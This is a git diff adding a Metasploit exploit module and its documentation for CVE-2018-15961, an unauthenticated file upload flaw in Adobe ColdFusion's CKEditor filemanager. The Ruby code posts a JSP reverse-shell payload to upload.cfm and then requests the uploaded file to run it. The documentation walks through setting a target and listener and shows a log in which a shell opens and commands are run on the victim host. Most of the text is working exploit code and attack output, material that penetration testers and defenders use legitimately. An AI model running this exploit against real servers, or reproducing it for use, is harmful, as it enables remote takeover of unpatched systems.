diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md new file mode 100644 index 0000000000..e84b7d0ca2 --- /dev/null +++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md @@ -0,0 +1,48 @@ +## Description + +A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 +(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and +ColdFusion 2018 (July 12 release) allows unauthenticated remote +attackers to upload and execute JSP files through the filemanager +plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739. + +## Vulnerable Application + +ColdFusion 11 (Update 14 and earlier), +ColdFusion 2016 (Update 6 and earlier), and +[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0) + +## Verification Steps + +1. `./msfconsole -q` +2. `use exploit/multi/http/coldfusion_ckeditor_file_upload` +3. `set rhosts ` +4. `set lhost ` +5. `exploit` +6. Get a shell + +## Scenarios + +### Tested on Coldfusion 2018 v2018.0.0.310739 + +``` +msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 +rhosts => 172.22.222.142 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 +lhost => 172.22.222.136 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp... +[+] Upload succeeded! Executing payload... +[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600 + +whoami +cfuser +uname -a +Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +exit +[*] 172.22.222.142 - Command shell session 1 closed. +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > +``` diff --git a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb new file mode 100644 index 0000000000..a45c207b2f --- /dev/null +++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload', + 'Description' => %q{ + A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 + (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and + ColdFusion 2018 (July 12 release) allows unauthenticated remote + attackers to upload and execute JSP files through the filemanager + plugin. + Tested on Adobe ColdFusion 2018.0.0.310739. + }, + 'Author' => + [ + 'Pete Freitag de Foundeo', # Vulnerability discovery + 'Vahagn vah_13 Vardanian', # First public PoC + 'Qazeer' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-15961' ], + [ 'BID', '105314' ], + [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ] + ], + 'Privileged' => false, + 'Platform' => %w{ linux win }, + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => %w{ linux win }, + 'Payload' => { 'DisableNops' => true }, + 'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'} + } + ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'RPORT' => 8500 }, + 'DisclosureDate' => 'Sep 11 2018' + )) + + register_options [ + OptString.new('TARGETURI', [ false, 'Base application path', '/' ]), + ] + end + + def exploit + filename = rand_text_alpha_upper(1..10) + '.jsp' + + print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...") + + mime = Rex::MIME::Message.new + mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"") + mime.add_part('path', 'text/plain', nil, 'form-data; name="path"') + + post_str = mime.to_s + post_str.strip! + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'), + 'version' => '1.1', + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=' + mime.bound, + 'data' => post_str, + }) + + unless res && res.code == 200 + fail_with Failure::Unknown, 'Upload Failed...' + end + + print_good('Upload succeeded! Executing payload...') + + send_request_cgi({ + 'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax', + 'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename), + 'method' => 'GET' + }, 5) + + end +end